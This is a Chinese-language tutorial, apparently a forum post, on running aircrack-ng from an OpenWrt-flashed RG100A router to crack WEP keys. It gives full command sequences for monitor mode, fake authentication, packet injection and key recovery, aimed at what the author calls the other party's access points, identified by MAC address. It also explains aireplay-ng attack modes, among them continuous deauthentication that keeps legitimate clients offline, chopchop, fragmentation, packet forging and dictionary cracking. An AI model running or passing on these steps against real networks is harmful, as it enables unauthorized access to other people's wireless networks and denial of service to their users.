用无线路由器破解WEP密码 RG100A-AA刷openwrt安装aircrack-ng进行wep加密破解
下面是实例破解AP:cisco airmon-ng start mon.wlan0
加密码方式:WEP 64位
AP频道:11
AP的MAC地址: 00:0F:34:C1:29:CA
我自己的MAC地址:00:74:04:02:B5:EA
opkg update
opkg install aircrack-ng
opkg install screen
//screen支持后台运行 可以后台抓包同时后台注入然后后台破解密码 抓包或破解时可以不用开电脑
//用putty.exe连接路由器新建一个screen 后台运行抓包
screen
//扫描信号
iwlist wlan0 scanning
//查看无线网信息
//精确 monitor 为11频道。 也就是创建 mon0 可以用airmon-ng stop mon0 关闭
//airmon-ng start wlan0 全频道
airmon-ng start wlan0 11
//开始抓包 在这里会显示扫描到的AP 从这里选择要破解的AP SSID、MAC地址等信息
//airodump-ng -w name mon0 参数 --ivs 只抓WEP -c 11 抓11频道
airodump-ng --ivs -w name -c 11 mon0
//我要破解的cisco 没有客户端 所以下面用注入方式
_________________________________________________________
|//抓包方式2: 只抓MAC为00:0F:34:C1:29:CA的包 |
|//airodump-ng -c 11 --bssid 00:0F:34:C1:29:CA -w name-01.ivs mon0 |
|_________________________________________________________|
//新建一个ssh 会话
//与AP建立虚拟连接
//aireplay-ng -1 0 -a AP'sMAC -h MyMAC mon0
//(AP'sMAC是要破解AP的MAC地址 -h后面跟着的MyMAC是自己的无线网卡的MAC地址 )
// 自己的无线网卡的MAC地址用ifconfig 或iwconfig查看
aireplay-ng -1 0 -a 00:0F:34:C1:29:CA -h 00:74:04:02:B5:EA mon0
//进行注入
//aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP'sMAC -h MyMAC mon0
//成功建立虚拟连接后输入:
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:0F:34:C1:29:CA -h 00:74:04:02:B5:EA mon0
//现在回头看下步骤3的终端是不是DATA在开始飞涨!
//等抓到1万数据包就可以破解,我抓到了29052个IVS
//新建一个ssh 会话
//进行WEP 64位破解
//aircrack-ng name-01.ivs
//aircrack-ng *.ivs
//aircrack-ng *.cap
aircrack-ng -n 64 name-01.ivs
选择要破解的SSID 序号 3
我运气好几秒钟就破出来了
aircrack-ng -w password.txt *.cap
aireplay-ng的六种攻击模式详解
-0 deautenticate冲突模式
使已经连接的合法客户端端强制断开与路由器的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效的arp数据。
如果一个客户端连在路由器上,但是没有人上网来产生有效数据,此时即使用-3也无法产生有效的arp数据,所以就需要用-0攻击模式来配合-3攻击来会被激活
aireplay-ng -0 10 -a ap_mac -c 合法客户端mac wifi0
参数说明:10 表示发送次数(设置为0表示循环攻击,客户端无法正常上网)
-a设置ap的mac地址,-c设置已连接的合法客户端的mac地址(如果要-c则所有与ap连接的客户端全部断线)
-1 fakeauth count 伪装一个客户端和ap进行连接
这是没有客户端研究学习的第一步,因为是没有合法连接的客户端,因此需要一个伪装客户端来和路由器连接。为让ap接受数据包,必须使自己的网卡和ap关联。-1伪装客户端连接成功够才能用发送注入命令
aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0
参数说明:0表示岩石0秒后连接;-e设置ap_essid;-a设置ap的mac地址 -h设置伪装客户端的网卡mac地址(就是自己网卡的mac地址)
-2 interactive 交互模式
这个模式集合了抓包和提取数据,发包注入三种功能
ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0
参数说明:-p设置控制帧中包含的信息(16进制),默认采用0841;-c:设置目标mac地址;-b设置ap的mac地址;-h伪装的客户端网卡mac地址(就是自己的mac地址)
提取包,发送注入数据包
aireplay-ng -2 -r myarp -x 1024 wifi0
参数说明:myarp:自己设置的文件名;-x 1024:发包的速度(最大为1024)
-3 arp-request注入攻击模式
这种模式是一种抓包后分析重发的过程
aireplay-ng -3 -b ap_mac -h 合法客户端mac -x 512 wifi0
-4 chopchop攻击模式,用来获得一个包含密钥数据的xor文件
aireplay-ng -4 -b ap-mac -h my_mac wifi0
-5 fragment 碎片包攻击模式,用来获得PRGA(包含密钥的后缀为xor的文件)
aireplay-ng -5 -b ap_mac -h my_mac wifi0
packetforge-ng 数据包制造程序
packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l 255.255.255.255 -y niam_xor -w mrarp
参数说明:-0:伪装arp数据包;-k:设置目标文件ip和端口;-l:设置源文件IP和端口;-y:从xor文件中读取PRGA;name:xor文件的名字;-w设置伪装的arp包的文件名
aircrack-ng -n 64 -b ap_mac name-01.ivs
参数说明:-n设置key长度(64/128/256/512)
screen 使用
screen -ls '显示screen列表
screen -r id '进入会话
Ctrl-a、Ctrl-c 切换到之前显示的窗口
Ctrl-d 暂时断开会话
C-a n 切换到下一个窗口
C-a p 切换到前一个窗口(与C-a n相对)
C-a ? 显示所有键绑定信息
C-a w 显示所有窗口列表
C-a C-a 切换到之前显示的窗口
C-a c 创建一个新的运行shell的窗口并切换到该窗口
C-a n 切换到下一个窗口
C-a p 切换到前一个窗口(与C-a n相对)
C-a 0..9 切换到窗口0..9
C-a a 发送 C-a到当前窗口
C-a d 暂时断开screen会话
C-a k 杀掉当前窗口
C-a [ 进入拷贝/回滚模式
______________________________________________________________________
Openwrt 下支持 aircrack-ng , WRT54G 能破解,那RG100A应该也能,来精神,心动不如行动吧。
首先opewnrt需安装两个Packager。
用SecureCRT 连接 RG100a
opkg update
opkg install aircrack-ng
opkg install screen '后台操作
安装后 就可以进行分析抓包了。
建立无线 的monitor
screen (建立screen, 试便下次用screen 登陆回来)
建立monitor 用于数据采集
airmon-ng start mon.wlan0
查看无线网信息
airodump-ng mon0
下载 (29.29 KB)
3 天前 17:23
分析: 查找到三个无线AP均无客户端, WEP无客户端破密有两种方法,1,守株待免,一直开着直到有客户端连接抓到一定数量的data为止, 2,采用aireplay-ng 方式注入产生大量数据包。当 data 数量但到1万左右就应该可以破WEP 密码啦。
==============================================
我使用了第二种方法。注入,破密对象是 HG520s
精确 monitor 为11频道。
airmon-ng start mon.wlan0 11
airodump-ng --ivs -w name -c 11 mon0 对11频道抓包存储在 name文件
攻击 ap之前建立一个虚拟连接 这步是关键
aireplay-ng -1 0 -e HG520s -a 00:16:E3:BB:FD:CF -h 00:1F:A3:B2:11:D0 mon0
注: HG520S 是对方AP, 00:16:E3:BB:FD:CF 是对方MAC, 00:1F:A3:B2:11:D0是RA100A的无线MAC, 用ifconfig 可以查到。
交互功击模式(即注入的其中一种方式)
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:16:E3:BB:FD:CF -h 00:1F:A3:B2:11:D0 mon0
出现 usr this packer ? 输入y 后, 你会看到
看data数量在猛增, 当达到1万时就可以停止,进行解密啦。
aircrack-ng -a wep name-01.ivs -l key.txt
cat key.txt
显示的就是 wep 密码